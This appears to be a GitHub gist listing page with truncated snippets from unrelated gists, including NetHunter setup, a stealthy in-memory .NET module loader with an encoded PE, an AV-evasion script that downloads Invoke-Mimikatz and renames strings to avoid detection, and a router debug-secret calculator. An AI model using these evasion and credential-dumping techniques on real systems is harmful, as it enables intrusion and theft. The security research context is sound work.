@singe
singe / Dockerfile
Last active May 29, 2020 19:49
Simple canary token binary wrapper
FROM alpine:latest as builder
LABEL maintainer="@singe at SensePost <research@sensepost.com>"
RUN apk update && apk --no-cache add \
build-base \
&& rm -rf /var/cache/apk/*
WORKDIR /
COPY yellow.c canary32.c canary32.h /
RUN gcc -o yellow yellow.c canary32.c
@jmmmbnnn
jmmmbnnn / set-up-nethunter
Created April 18, 2018 01:58
Nexus 10 (manta) Nethunter Setup Snippets (WiFi Pineapple, Metasploit, ExploitDB / SearchSploit, Wireshark, CAN, Ubertooth)
#!/bin/bash
# author: jmmmbnnn
# https://www.kali.org/news/kali-linux-2018-1-release/
# Note that if you haven’t updated your Kali installation in some time (tsk2), you will likely receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -
# Update and upgrade
apt update -y
apt upgrade
@mattifestation
mattifestation / LoadInMemoryModule.ps1
Created March 30, 2018 18:01
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active April 29, 2024 14:36
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. In this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@PaulSec
PaulSec / invoke_evasion.sh
Created August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
# get total requests by status code
awk '{print $9}' /var/log/nginx/access.log | sort | uniq -c | sort -rn
# get top requesters by IP
awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'
# get top requesters by user agent
awk -F'"' '{print $6}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head
# get top requests by URL
@kost
kost / zynsecrets.c
Created March 13, 2017 14:46
Calculate Bootbase/bootext secret for debug commands (ATEN 1,xxxx) - Zyxel, Huawei, ZTE, etc. - similar to zynpass but working for larger devices
/*
Calculate Bootbase/bootext secret for debug commands
Zyxel, Huawei, ZTE, etc.
Usage:
$ gcc zynsecrets.c -o zynsecrets
$ ./zynsecrets 000102030403
Copyright (C) Kost, https://gist.github.com/kost
@ntamvl
ntamvl / clean-up-unused-github-rpositories.md
Last active February 21, 2024 11:14
Clean Up Unused GitHub Repositories! Delete all unused repositories and forgotten forks in 6 (semi)-automatic steps!

Clean Up Unused GitHub Repositories!

Delete all unused repositories and forgotten forks in 6 (semi)-automatic steps!

Ugh. GitHub forces me to type my password for every fork and repository I want to delete. That’s smart and all, but what if one wants to mass-delete a bunch of old, unused, forgotten, dirty little repositories that make his repository list look like a mess? Well, that person follows this short guide:

[1.] Open in a new tab all to-be-deleted GitHub repositories (use the mouse’s middle click)

https://github.com/wildeyes?tab=repositories
@mihow
mihow / load_dotenv.sh
Last active May 4, 2024 12:32
Load environment variables from dotenv / .env file in Bash
# Export every KEY=VALUE line from .env into the current shell; run this with `source` so the variables persist.
# The test must be `-f .env` (file exists), not `! -f .env`, otherwise nothing is ever loaded.
if [ -f .env ]
then
export $(cat .env | xargs)
fi
@marcan
marcan / linux.sh
Last active December 1, 2023 15:18
Linux kernel initialization, translated to bash
#!/boot/bzImage
# Linux kernel userspace initialization code, translated to bash
# (Minus floppy disk handling, because seriously, it's 2017.)
# Not 100% accurate, but gives you a good idea of how kernel init works
# GPLv2, Copyright 2017 Hector Martin <marcan@marcan.st>
# Based on Linux 4.10-rc2.
# Note: pretend chroot is a builtin and affects the current process
# Note: kernel actually uses major/minor device numbers instead of device name